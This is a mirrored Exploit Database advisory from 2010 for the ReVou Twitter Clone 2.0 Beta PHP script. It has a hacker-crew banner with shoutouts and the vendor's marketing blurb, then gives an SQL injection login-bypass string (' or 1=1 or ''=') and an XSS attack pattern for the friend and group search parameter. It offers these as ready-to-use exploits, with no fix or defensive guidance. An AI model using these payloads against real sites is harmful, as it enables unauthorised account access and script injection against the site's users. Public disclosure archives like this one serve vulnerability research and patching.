ReVou Twitter Clone 2.0 Beta – SQL Injection / Cross-Site Scripting

• Exploit Database
• 10 阅读

• 作者： Sid3^effects
  日期： 2010-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13752/

• # Title:reVou twitter clne Beta 2.0 sqli and Xss vulnerability
  # Author: Sid3^effects
  # Published: 2010-06-06
  # price:$99
  # email:shell_c99@yahoo.com
  # vendor: Revou
  # url : http://www.revou.com/demo/home
  
  ############################################################################
  ooooo.oooooo.oooooo oooooo oooo 
  `888' d8P'`Y8b`888.`888. .8' 
   888 888 `888. .8888. .8' 
   888 888`888.8'`888. .8' 
   888 888 `888.8'`888.8'
   888 `88booo`888'`888' 
  o888o `Y8bood8P' `8'`8'
  
  -------------------------------------------------------------------------------------- 
  #####################Sid3^effects aKa HaRi################################## 
  #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] 
  #Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L,CR4C|< 008,M4n0j,MaYuR 
  #ShouTZ:kedar,dec0d3r,41.w4r10r
  #spl shoutz:LiquidWorm,gunslinger_ :D
  #Catch us at www.andhrahackers.com or www.teamicw.in 
  ############################################################################ 
  Description :
  Existing site owners can benefit from running a micro blogging service resulting in more viral growth for your website when your users interact with follow
  friends by receiving updates via our social network platform. With our SMS integration as well as custom API, we allow you to gain more revenues through
  purchase of SMS credits, revenues from web advertisements and as well benefiting from 3rd party applications built for your site using our API.
   
  ReVou Micro Blogging social networking script can use for any industries ranging from real estate, cooperate events, hobbyist websites or any social
  networking sites which you can create a platform for your users to get updates or interact with each other.
   
  ############################################################################ 
  Xploit : sqli vulnerability.
  
  use ' or 1=1 or ''=' to login
  Demo Url : http://server/path/
  ############################################################################
  Xploit : xssvulnerability
   Parameter Name: search friends or groups
   Parameter Type: Querystring
   Attack Pattern: '"-->
   
  ############################################################################ 
  #spl thks: exploit-db.com
  #Sid3^effects